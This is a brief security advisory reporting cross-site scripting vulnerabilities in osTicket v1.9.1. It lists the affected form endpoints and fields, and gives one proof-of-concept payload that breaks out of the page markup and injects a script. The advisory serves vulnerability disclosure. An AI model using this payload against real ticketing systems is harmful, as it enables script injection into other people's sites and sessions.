Description

osTicket is a widely-used open source support ticket system. It seamlessly integrates inquiries created via email and web-based forms into a simple easy to use multi-user web interface.

Details

osTicket is affected by XSS vulnerabilities in version v1.9.1.
osTicket PoC urls are as follows:

  • Cross-site Scripting
    http://example.com/open.php (POST, fields: Phone Number)
    '"--></style></scRipt><scRipt>alert(0x000335)</scRipt>

    http://example.com/account.php – (POST, fields: Phone Number,passwd1,passwd2)
